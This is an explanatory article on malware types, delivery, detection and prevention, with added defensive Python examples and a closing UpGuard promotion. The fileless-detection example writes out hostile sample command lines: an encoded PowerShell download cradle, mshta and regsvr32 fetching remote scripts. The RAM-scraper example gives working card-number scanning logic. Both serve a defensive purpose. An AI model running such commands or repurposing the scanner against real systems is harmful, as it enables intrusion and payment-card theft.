Generally, software is considered malware based on the intent of its creator rather than its actual features. Malware seeks to invade, damage, or disable computer systems, networks, tablets and mobile devices, often taking partial control over a device's operations or leaking sensitive data, personally identifiable information (PII) and biometrics to an unauthorized third party.
The cybercriminals who create malware are usually after money, whether by extorting it from you directly, by misusing your computing resources, or by selling what they steal; some act for competitors or governments conducting espionage. Malware rarely damages physical hardware or network equipment (Stuxnet and the CIH virus, discussed below, are the notable exceptions). It generally focuses on stealing, encrypting, deleting or altering data, hijacking core computing functions, or spying on your activity.
How does malware work?
Malicious programs can be delivered on a USB drive or spread over the internet through drive-by downloads, which install the program without the user's approval, typically by exploiting a vulnerability in the browser or a plugin. USB drives are popular with attackers because they bypass network-based controls such as email filtering and web proxies, and a planted drive relies on the finder's curiosity rather than on a software flaw.
Social engineering attacks such as phishing are another common delivery mechanism. All it takes is a malicious attachment in an email disguised as a legitimate message, or a link to a page that serves one.
Fraudulent websites and peer-to-peer file-sharing services that claim to offer legitimate software are another way to spread malware, and pirated software often bundles malware as well.
Android and Apple mobile devices can also be infected through text messages (smishing) or by installing fraudulent apps.
More sophisticated malware uses a command-and-control (C2) server that lets attackers send instructions to the infected machine, exfiltrate sensitive data and add the device to a botnet.
Newer malware strains use evasion and obfuscation techniques designed to fool users, security analysts and anti-malware products such as Malwarebytes.
Evasion techniques range from simple proxies that frustrate IP attribution, to polymorphic malware that rewrites its own code on each infection to defeat signature-based detection, to anti-sandbox checks that recognize an analysis environment and pause execution, to fileless malware that runs only in the computer's RAM.
Any malware is a cybersecurity risk, whether it is stealing sensitive information or credit card numbers, capturing keystrokes or mining cryptocurrency.
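To make the signature-evasion point concrete, here is an added illustration (not code from the original page) of why an exact-hash blocklist and a plain byte-string signature both miss a re-keyed polymorphic sample, while a detection that models the decoder stub still catches it. The "samples" are constructed byte strings built around a toy XOR decoder; the stub layout, magic bytes and marker string are assumptions for the example, not a real malware family.

```python
"""Why hash- and string-based signatures miss polymorphic malware, and why a
detection that models the decoder does not.

Added illustration, not code from the original page. The "samples" are
constructed byte strings with a toy XOR decoder stub; no real malware."""
import hashlib

# Constructed behaviour marker an analyst would actually want to flag.
BAD_STRING = b"cmd.exe /c powershell -w hidden -enc"

# Toy "decoder stub" layout (assumed): magic, 2-byte XOR key, encoded body.
STUB_MAGIC = b"\x7fSTUB"
KEY_LEN = 2


def xor(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; symmetric, so it both encodes and decodes."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def build_sample(body: bytes, key: bytes) -> bytes:
    """One 'generation' of the polymorphic sample: same body, new key."""
    assert len(key) == KEY_LEN and b"\x00" not in key, "a zero key byte leaves plaintext visible"
    return STUB_MAGIC + key + xor(body, key)


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def hash_blocklist_hit(sample: bytes, blocklist: set) -> bool:
    """Exact-hash matching only catches bytes you have already seen."""
    return sha256(sample) in blocklist


def string_signature_hit(sample: bytes) -> bool:
    """Plain byte-string signature: defeated by the XOR layer."""
    return BAD_STRING in sample


def decoder_aware_hit(sample: bytes) -> bool:
    """Model the stub: recover the key, decode the body, then match."""
    if not sample.startswith(STUB_MAGIC):
        return False
    key = sample[len(STUB_MAGIC):len(STUB_MAGIC) + KEY_LEN]
    body = xor(sample[len(STUB_MAGIC) + KEY_LEN:], key)
    return BAD_STRING in body


def demo() -> dict:
    body = b"payload: " + BAD_STRING + b" SQBFAFgA..."
    gen1 = build_sample(body, b"\x13\x37")   # the copy already in your blocklist
    gen2 = build_sample(body, b"\xaa\x55")   # the next infection's re-keyed copy
    blocklist = {sha256(gen1)}
    return {
        "hash_gen1": hash_blocklist_hit(gen1, blocklist),
        "hash_gen2": hash_blocklist_hit(gen2, blocklist),
        "string_gen1": string_signature_hit(gen1),
        "string_gen2": string_signature_hit(gen2),
        "decoder_gen1": decoder_aware_hit(gen1),
        "decoder_gen2": decoder_aware_hit(gen2),
    }


if __name__ == "__main__":
    for rule, hit in demo().items():
        print(f"{rule:14s} {'HIT' if hit else 'miss'}")
```

The hash rule catches only the generation it was built from, the string rule catches neither, and the decoder-aware rule catches both; real anti-malware engines get the same effect by emulating or unpacking the sample before matching, which is also why sandbox evasion matters to attackers.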
Can mobile devices get malware?
Mobile phones can be infected with malware that gives an attacker unauthorized access to the device's camera, microphone, GPS, apps and accelerometer. Infections come from installing apps from unofficial sources, clicking malicious links in emails or text messages, Bluetooth and Wi-Fi-based attacks, or exploitation of software vulnerabilities.
Android devices are infected more often than iOS devices, largely because Android allows apps to be installed from outside the official store (sideloading) and because many Android devices run outdated versions of the operating system. Signs that an Android device is infected include unusual data usage, poor battery life, and texts or emails being sent from the device without your knowledge. Similarly, if you receive a suspicious text from a colleague, their device may be infected and trying to spread malware to yours.
Another reason iOS devices are less often infected is the App Store's vetting of new and updated applications, combined with the platform's restriction on installing apps from other sources.
What's the difference between a virus and malware?
All computer viruses are malware, but not all malware is a virus. Viruses are one type of malware. The terms are often used interchangeably, but technically they differ.
Malware is any malicious code, whereas a computer virus is malicious code that inserts copies of itself into other programs or files and so spreads across computers and networks when those infected hosts are run or shared.
What are the different types of malware?
Types of malware include:
- Computer viruses: Viruses are a type of malware that self-replicates by modifying other computer programs and inserting its own code. When replication succeeds, the affected computer is said to be infected.
- Computer worms: Computer worms are self-replicating malware programs whose primary purpose is to infect other computers by copying themselves across the network. Unlike viruses they need no host program, and they often spread by exploiting vulnerabilities or weak network security.
- Trojan horses: Trojan horses are malware that misleads users by pretending to be a legitimate program. The term comes from the Ancient Greek story of the deceptive Trojan Horse that led to the fall of Troy.
- Rootkits: Rootkits are a collection of software designed to give an attacker privileged access to a computer while hiding their own presence or that of other malware. Installation can be automated, or an attacker who already has administrator access can install one. Anti-malware software often struggles to detect rootkits because they run at the same privilege level as the defences (in the kernel, the boot process or even firmware), and removal typically means rebuilding the system from clean media; a firmware rootkit may require reflashing or replacing the affected hardware.
- Ransomware: Ransomware attacks deny access to a computer system or data until ransom is paid. Ransomware attacks cause downtime, data leaks, intellectual property theft and data breaches.
- Keyloggers: Keyloggers, keystroke loggers or system monitoring tools are a type of malware used to monitor and record each keystroke typed on a keyboard or mobile device. Keyloggers are often used to gain access to personal information or login credentials.
- Grayware: Grayware is unwanted software or files that degrade a computer's performance and create security risk without being outright malicious.
- Fileless malware: Fileless malware abuses legitimate programs already on the system, such as PowerShell or WMI, to do its work. Because it does not write its own executable to disk and runs largely from memory, it is hard for file-scanning malware protection to detect and remove, and it leaves little evidence for digital forensics.
- Adware: Adware is a type of grayware designed to put advertisements on your screen often in a web browser pop-up.
- Malvertising: Malvertising, a portmanteau of malicious advertising, is the use of advertising to spread malware. It typically involves injecting malicious advertisements into legitimate advertising networks or webpages.
- Spyware: Spyware gathers information about a person or organization without their knowledge and sends it to the attacker.
- Botnets: Botnets are networks of infected devices that an attacker controls remotely, often in real time, to launch cyber attacks. Botnets are a popular method for launching distributed denial of service (DDoS) attacks.
- Backdoors: A backdoor is a covert method of bypassing normal authentication or encryption in a computer, product, embedded device (e.g. router) or other component. Attackers commonly plant them to retain remote access to a compromised machine or to reach encrypted files.
- Browser hijackers: Browser hijackers, or hijackware, change the behavior of a web browser by redirecting the user to a new page, changing their home page, or installing unwanted software. Because the hijacker sits between the user and the sites they visit, it can also intercept and alter traffic in the manner of a man-in-the-middle attack.
- Crimeware: Crimeware is a class of malware designed to automate cybercrime. It is designed to perpetrate identity theft, steal financial accounts to sell on the dark web or gather sensitive information.
- Malicious mobile apps: Not all apps in the Google Play Store or Apple App Store are legitimate, although the App Store is generally better at pre-screening third-party apps. Android phones and other Android devices are more frequent targets because of their more open ecosystem.
- RAM scrapers: RAM scrapers harvest data temporarily stored in memory. They often target point-of-sale (POS) systems such as cash registers, which hold unencrypted credit card numbers for a short period before passing them to the back-end.
- Rogue security software: Rogue security software tricks the user into thinking their system has a security problem and entices them to pay to remove it.
- Cryptojacking: Cryptojackers are a form of malware that uses a victim's computing power to mine cryptocurrency.
- Hybrid malware: Hybrid malware is malware that combines a variety of different malware attacks to make malware removal more difficult.
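The RAM scraper entry above is easiest to understand by seeing what the scraper actually searches for. The following is an added example, not code from the original page: it scans a buffer for 13 to 19 digit runs, keeps only those that pass the Luhn check, and then runs the same scan over a buffer from a terminal that encrypts card data before it reaches RAM (point-to-point encryption). Both "memory dumps" are constructed byte strings using standard test card numbers; the same scanning logic is what a DLP or forensic tool uses to find cleartext card data.

```python
"""What a RAM scraper looks for in point-of-sale memory, and why encrypting
card data at the terminal (P2PE) defeats it.

Added example, not code from the original page. The two "memory dumps" are
constructed byte strings using standard test card numbers; a real scanner
would read the target process's memory instead."""
import re

# 13-19 digit runs not adjacent to other digits: candidate card numbers (PANs).
PAN_RE = re.compile(rb"(?<!\d)(\d{13,19})(?!\d)")


def luhn_ok(digits: str) -> bool:
    """Luhn check-digit validation, as used on payment card numbers."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:          # double every second digit from the right
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def find_pans(buf: bytes) -> list:
    """Return Luhn-valid card numbers found in a memory buffer, in order.
    This is the core of a scraper and equally of a DLP/forensic scanner."""
    return [m.group(1).decode() for m in PAN_RE.finditer(buf)
            if luhn_ok(m.group(1).decode())]


def mask(pan: str) -> str:
    """Show only the first six and last four digits (PCI DSS display rule)."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


# Constructed: a naive POS process that held cleartext track data in memory.
CLEARTEXT_POS_MEMORY = (
    b"\x00\x00ORDER:1234567890123\x00"          # 13 digits, fails Luhn: not a PAN
    b"track2=4111111111111111=2512101?\x00"    # Visa test PAN in track-2 layout
    b"cust_phone=15551234567\x00"               # too short to match
    b"log: card 5500000000000004 approved\x00" # Mastercard test PAN
    b"ref=1234567812345678\x00"                 # 16 digits, fails Luhn
)

# Constructed: the same terminal with P2PE, where only ciphertext reaches RAM.
P2PE_POS_MEMORY = (
    b"\x00\x00ORDER:1234567890123\x00"
    b"track2=ENC:9f3ab27c6d1e4f0a8b9c2d3e4f5a6b7c\x00ksn=a1b2c3d4\x00"
    b"log: card token tok_8c1f9e approved\x00"
)


def demo() -> dict:
    return {"cleartext": [mask(p) for p in find_pans(CLEARTEXT_POS_MEMORY)],
            "p2pe": [mask(p) for p in find_pans(P2PE_POS_MEMORY)]}


if __name__ == "__main__":
    for name, pans in demo().items():
        print(f"{name}: {pans or 'no card numbers found'}")
```

The Luhn filter is what keeps order numbers, timestamps and other digit runs out of the results; the P2PE buffer yields nothing because the scraper has nothing cleartext to find, which is the architectural fix for this class of malware.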
How to prevent malware infections
To prevent malware, use a defense in depth strategy that combines technical and non-technical controls.
Phishing emails are one of the most common infection paths, so educate employees about phishing and train them not to download suspicious attachments or interact with unexpected emails. Also watch for suspicious domains and typosquatting that masquerades as legitimate websites.
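Watching for typosquatting is easier when you know what the variants look like. The following is an added example, not code from the original page: it generates the common look-alike variants of a domain you protect (character omission, transposition, repetition, homoglyph substitution and TLD swap) and flags any that appear in an observed list, plus the trick of using your real domain as a subdomain of an attacker's. The observed domains are constructed; in practice the list would come from a newly-registered-domain feed, proxy logs or certificate-transparency entries, and `example.com` stands in for your own domain.

```python
"""Flag look-alike domains for a brand you protect.

Added example, not code from the original page. Generates the common
typosquat variants of a legitimate domain and matches them against an
observed list (constructed here; in practice a newly-registered-domain
feed, proxy logs or certificate-transparency entries)."""

# Character swaps that look similar in many fonts or URL bars.
HOMOGLYPHS = {"o": "0", "l": "1", "i": "1", "e": "3", "a": "4", "s": "5",
              "rn": "m", "m": "rn", "vv": "w", "w": "vv"}
ALT_TLDS = ["com", "net", "org", "co", "cm", "info", "biz"]


def typosquat_candidates(domain: str) -> set:
    """Omission, transposition, repetition, homoglyph and TLD-swap variants."""
    name, tld = domain.lower().rsplit(".", 1)
    variants = set()
    for i in range(len(name)):
        variants.add(name[:i] + name[i + 1:])                          # omission
        variants.add(name[:i] + name[i] + name[i:])                    # repetition
    for i in range(len(name) - 1):
        variants.add(name[:i] + name[i + 1] + name[i] + name[i + 2:])  # transposition
    for src, dst in HOMOGLYPHS.items():
        if src in name:
            variants.add(name.replace(src, dst, 1))                    # homoglyph
    variants.discard(name)
    variants.discard("")
    candidates = {f"{v}.{tld}" for v in variants}
    candidates |= {f"{name}.{t}" for t in ALT_TLDS if t != tld}       # TLD swap
    return candidates


def flag_lookalikes(observed, legit: str) -> dict:
    """Map each suspicious observed domain to the reason it was flagged."""
    legit = legit.lower()
    candidates = typosquat_candidates(legit)
    hits = {}
    for d in observed:
        d = d.lower().rstrip(".")
        if d == legit or d.endswith("." + legit):
            continue                               # the real domain or a real subdomain
        if d in candidates:
            hits[d] = "typosquat"
        elif d.startswith(legit + "."):
            hits[d] = "legit-domain-as-subdomain"  # e.g. example.com.evil.net
    return hits


# Constructed observed domains, as if pulled from a newly-registered-domain feed.
OBSERVED = ["examp1e.com", "exmaple.com", "example.co", "exampel.com",
            "example.com.secure-login.net", "login.example.com", "unrelated.org"]

if __name__ == "__main__":
    for dom, why in sorted(flag_lookalikes(OBSERVED, "example.com").items()):
        print(f"{dom:32s} {why}")
```

Real subdomains of your own domain are deliberately skipped so the check does not flag your own infrastructure; the candidate set is also what you would feed to a domain registrar or certificate-transparency monitor to be alerted when one is registered.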
Don't sideload apps from outside Google Play on Android devices, and avoid clicking pop-up ads.
Other, more technical preventive measures include keeping your systems patched to close known vulnerabilities, deploying email authentication (SPF, DKIM and DMARC) to counter email spoofing, tracking new vulnerabilities as they are published as CVEs, continuously monitoring your third-party and fourth-party vendors for malware infections, scanning your websites for security issues, and keeping offline backups of your files to reduce the impact of ransomware.
One of the most famous malware attacks was the WannaCry ransomware worm, which spread using the EternalBlue exploit against a vulnerability in the SMBv1 service of older Windows versions (patched by Microsoft as MS17-010 two months before the outbreak). It remains a risk today because many organizations still have not applied the patch or retired the affected systems.
The lesson here is that while keeping software up-to-date can be time-consuming, it's one of the easiest ways to reduce your cybersecurity risk. Beyond patching, third-party risk and fourth-party risk are an often overlooked part of preventing data breaches and malware infections.
It's not enough for your information security policy and information risk management strategy to only focus on your organization. Your cybersecurity risk assessment process needs to have a third-party risk management framework, vendor management policy and a vendor risk management program. Consider investing in a tool to automate vendor risk management.
How to detect malware
There are a few universal symptoms that may indicate the presence of malware on your device:
- Your device is running slower than usual: A sudden slowdown can indicate that malware is consuming your device's processing resources; cryptojackers are a common cause.
- You notice a shortage of available storage space: Many forms of malware write additional files to your device, which reduces the storage available.
- Pop-ups and unwanted programs appear on your device: This is a common sign of adware or a browser hijacker.
- Your sensitive data has been exposed: Continuously monitoring for data exposures can help you understand when your data has been exposed by a malware infection.
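The symptoms above are what a user notices; a defender looking at host telemetry watches for the behaviours behind them, especially the fileless, living-off-the-land patterns described earlier that leave no executable to find. The following is an added example, not code from the original page, of detection logic run over constructed, simplified process-creation records (the field names are assumptions, not a real Sysmon or EDR schema): it flags Office applications spawning script hosts, PowerShell launched hidden or with an encoded command, decodes the `-EncodedCommand` payload (base64 of UTF-16LE text) to look for download cradles, and catches `mshta`, `regsvr32` and `rundll32` pulling scripts from a URL.

```python
"""Host-side detection for fileless / living-off-the-land activity.

Added example, not code from the original page. The events below are
constructed, simplified process-creation records (not real Sysmon/EDR
output) and the rules are illustrative, not a complete rule set."""
import base64
import re

OFFICE_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe")
SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "regsvr32.exe", "rundll32.exe")
SUSPICIOUS_PS = ("iex", "invoke-expression", "downloadstring", "frombase64string",
                 "invoke-webrequest", "net.webclient")
# PowerShell accepts any unambiguous prefix of -EncodedCommand.
ENC_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str):
    """-EncodedCommand takes base64 of UTF-16LE text; return the script or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="ignore")
    except ValueError:          # not valid base64 after all
        return None


def analyze(event: dict) -> list:
    """Return the names of every rule the event trips, in rule order."""
    hits = []
    image = basename(event["image"])
    parent = basename(event.get("parent_image", ""))
    cmd = event.get("cmdline", "")
    low = cmd.lower()
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        hits.append("office_spawns_script_host")
    if image in ("powershell.exe", "pwsh.exe"):
        if re.search(r"-w(?:indowstyle)?\s+hidden", low):
            hits.append("powershell_hidden_window")
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            hits.append("powershell_encoded_command")
            if any(tok in decoded.lower() for tok in SUSPICIOUS_PS):
                hits.append("encoded_download_cradle")
        elif any(tok in low for tok in SUSPICIOUS_PS):
            hits.append("download_cradle")
    if image in ("mshta.exe", "regsvr32.exe", "rundll32.exe") and re.search(r"https?://", low):
        hits.append("lolbin_remote_script")
    return hits


def scan(events) -> dict:
    """Map pid -> rule hits for every event that trips at least one rule."""
    out = {}
    for e in events:
        hits = analyze(e)
        if hits:
            out[e["pid"]] = hits
    return out


def _enc(ps: str) -> str:
    """Encode a script the way PowerShell expects for -EncodedCommand."""
    return base64.b64encode(ps.encode("utf-16-le")).decode()


# Constructed events (assumed field names). 203.0.113.5 is a documentation address.
SAMPLE_EVENTS = [
    {"pid": 4120, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": "powershell.exe -nop -w hidden -enc " + _enc(
         "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')")},
    {"pid": 4188, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"pid": 4210, "image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "cmdline": "mshta.exe http://203.0.113.5/x.hta"},
    {"pid": 4300, "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Windows\explorer.exe", "cmdline": "cmd.exe /c dir"},
    {"pid": 4350, "image": r"C:\Windows\System32\regsvr32.exe",
     "parent_image": r"C:\Windows\System32\svchost.exe",
     "cmdline": "regsvr32.exe /s /n /u /i:https://203.0.113.5/t.sct scrobj.dll"},
]

if __name__ == "__main__":
    for pid, hits in scan(SAMPLE_EVENTS).items():
        print(pid, ", ".join(hits))
```

The benign PowerShell and cmd.exe events produce no hits, which is the point: parent-child relationships and decoded arguments, not the mere presence of PowerShell, separate fileless attacks from routine administration. Feeding real process-creation logs into `scan` requires only mapping your telemetry's field names onto `image`, `parent_image` and `cmdline`.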
How to remove malware
If you suspect a malware infection, install a reputable anti-malware program and run a full scan. These programs are designed to find and remove malware on your device; for a serious infection, or where a rootkit is suspected, rebuilding the device from clean media is the safer option.
Once your device is clean, change your passwords and check your financial accounts for suspicious transactions. Remember that an attacker doesn't necessarily use the information they gather right away. Also look for signs of a data breach or configuration changes in your cloud services that could cause a data leak.
Sometimes you can spot malware as an unfamiliar executable in the list of running processes, but fileless malware, which hides inside legitimate processes such as PowerShell, is making this harder.
The key thing to understand is that once your sensitive data is exposed, it's hard to know where it has gone or the full extent of the attack. This is why it pays to invest in preventing the malware infections that lead to data breaches; one 2019 industry estimate put the average cost of a data breach at $3.92 million.
And it's not just unsophisticated businesses that suffer from data breaches and malware infections; some of the biggest data breaches ever were at technology companies.
What are some examples of malware?
- WannaCry: WannaCry is a ransomware cryptoworm cyber attack that targets computers running the Microsoft Windows operating system. It was initially released on 12 May 2017. The ransomware encrypted data and demanded ransom of $300 to $600, paid in the cryptocurrency Bitcoin.
- Stuxnet: Stuxnet is a malicious computer worm, first uncovered in 2010, thought to have been in development since at least 2005. Stuxnet targets SCADA systems and is believed to be responsible for causing substantial damage to Iran's nuclear program.
- Morris worm: The Morris worm or Internet worm of November 2, 1988, was one of the first computer worms distributed via the Internet, and the first to gain significant mainstream media attention. It also resulted in the first felony conviction in the US under the 1986 Computer Fraud and Abuse Act.
- CIH virus: Also known as the "Chernobyl virus" because its payload was set to trigger on 26 April, the anniversary of the Chernobyl nuclear disaster in Ukraine. The virus wiped data from the hard drives of infected machines and attempted to overwrite the BIOS flash chip, which rendered affected computers unbootable.
- Petya: The malware targets Microsoft Windows–based systems, infecting the master boot record to execute a payload that encrypts a hard drive's file system table and prevents Windows from booting. It subsequently demands that the user make a payment in Bitcoin in order to regain access to the system.
What is the history of malware?
Before the Internet became popular, malware was spread on personal computers by executing programs on floppy disks. The malware, often a virus, would install itself on the computer and run itself whenever the computer was turned on.
Early viruses targeted the Apple II and Macintosh but quickly spread to the IBM PC and MS-DOS. The Farooq Alvi brothers in Pakistan created the first IBM PC virus, Brain, in 1986.
By 1988 the first well-known Internet worm, the Morris worm, had appeared, infecting SunOS and VAX BSD systems. Unlike a virus, it did not insert itself into other programs; it exploited vulnerabilities in network services and ran itself, much like modern worms.
In the 1990s there was a rise in Microsoft Office macro-based malware that spread through infected documents and templates. From 2002 to 2007 there was a rise in instant-messaging worms that spread through AOL, AIM, MSN and Yahoo Messenger.
Adware based attacks proliferated in the mid to late 2000s as did social network based malware attacks.
Today, ransomware and cryptojackers are among the most common malware threats.
How UpGuard can prevent malware infections
There's no question that cybersecurity is more important than ever before.
That's why companies like Intercontinental Exchange, Taylor Fry, The New York Stock Exchange, IAG, First State Super, Akamai, Morningstar and NASA use UpGuard to protect their data, prevent data breaches, monitor for vulnerabilities and avoid malware.
UpGuard BreachSight can help combat typosquatting, prevent data breaches and data leaks, avoid regulatory fines and protect your customers' trust through cyber security ratings and continuous exposure detection.
UpGuard Vendor Risk can minimize the amount of time your organization spends managing third-party relationships by automating vendor questionnaires and continuously monitoring your vendors' security posture over time while benchmarking them against their industry.
Each day, our platform scores your vendors with a Cyber Security Rating out of 950. We can even alert you if their score drops.